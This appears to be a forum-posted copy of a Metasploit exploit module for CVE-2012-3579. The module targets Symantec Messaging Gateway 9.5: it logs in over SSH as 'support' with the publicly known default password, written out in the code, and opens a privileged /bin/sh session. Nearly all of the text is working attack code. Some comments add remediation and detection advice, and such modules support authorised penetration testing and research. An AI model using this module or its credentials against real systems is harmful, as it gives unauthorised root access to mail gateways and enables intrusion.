Symantec Messaging Gateway / SSH Default Password Security Bypass Vulnerability 10-23-2012, 11:33 AM
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require'msf/core'
require'net/ssh'
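# Metasploit exploit module for CVE-2012-3579: Symantec Messaging Gateway 9.5
# ships a `support` account whose default password is publicly known, so any
# host that can reach the appliance's SSH service can obtain a privileged shell.
#
# The module performs one SSH login with that fixed credential pair and, on
# success, hands a /bin/sh command stream to the framework's session handler.
#
# Defensive notes:
# * Remediation is the vendor fix described in the Symantec advisory listed
#   under 'References'. Until it is applied, limit reachability of SSH on the
#   appliance to management networks and rotate the `support` password if the
#   appliance permits it.
# * Detection: review the appliance's SSH authentication logs for accepted
#   logins of `support`, particularly from addresses outside the admin range.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Auxiliary::CommandShell

  # Registers module metadata, the RHOST/RPORT options and the advanced SSH
  # tuning options (SSH_DEBUG, SSH_TIMEOUT).
  #
  # @param info [Hash] metadata merged into the module defaults by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability",
      'Description'    => %q{
          This module exploits a default misconfiguration flaw on Symantec Messaging Gateway.
        The 'support' user has a known default password, which can be used to login to the
        SSH service, and gain privileged access from remote.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Stefan Viehbock', # Original discovery
          'Ben Williams',    # Reporting the vuln + coordinated release
          'sinn3r'           # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2012-3579'],
          ['OSVDB', '85028'],
          ['BID', '55143'],
          ['URL', 'https://www.sec-consult.com/files/20120829-0_Symantec_Mail_Gateway_Support_Backdoor.txt'],
          ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => "none"
        },
      'Payload'        =>
        {
          'Compat' => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Symantec Messaging Gateway 9.5', {}],
        ],
      'Privileged'     => true,
      # Timestamp on Symantec advisory
      # But was found on Jun 26, 2012
      'DisclosureDate' => "Aug 27 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(22)
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  # @return the target host taken from the RHOST datastore option
  def rhost
    datastore['RHOST']
  end

  # @return the target port taken from the RPORT datastore option
  def rport
    datastore['RPORT']
  end

  # Attempts one SSH login using password / keyboard-interactive authentication.
  #
  # @param user [String] account name to authenticate as
  # @param pass [String] password to present
  # @return [Net::SSH::CommandStream, nil] a stream running /bin/sh when the
  #   login succeeds; nil on connection errors, disconnects, timeouts,
  #   rejected credentials or any other Net::SSH error
  def do_login(user, pass)
    opts = {
      :auth_methods     => ['password', 'keyboard-interactive'],
      :msframework      => framework,
      :msfmodule        => self,
      :port             => rport,
      :disable_agent    => true,
      # Do not read local OpenSSH config files; only the options here apply.
      :config           => false,
      :password         => pass,
      :record_auth_info => true,
      :proxies          => datastore['Proxies']
    }

    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

    begin
      ssh = nil
      # Bound the whole negotiation so an unresponsive service cannot hang the run.
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError, Rex::AddressInUse
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      # No explicit return: ssh is still nil here, so control falls through to
      # the final `return nil`. A rejected login means the default password is
      # no longer accepted on this host.
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh
      # NOTE(review): CommandStream is not part of stock net-ssh; presumably it
      # comes from the framework's bundled Net::SSH extensions - confirm.
      conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
      ssh = nil
      return conn
    end

    return nil
  end

  # Logs in with the fixed `support` credentials and, when the login succeeds,
  # passes the command stream's lsock to the payload handler.
  def exploit
    user = 'support'
    pass = 'symantec'
    print_status("#{rhost}:#{rport} - Attempt to login...")
    conn = do_login(user, pass)
    if conn
      print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'")
      handler(conn.lsock)
    end
  end
end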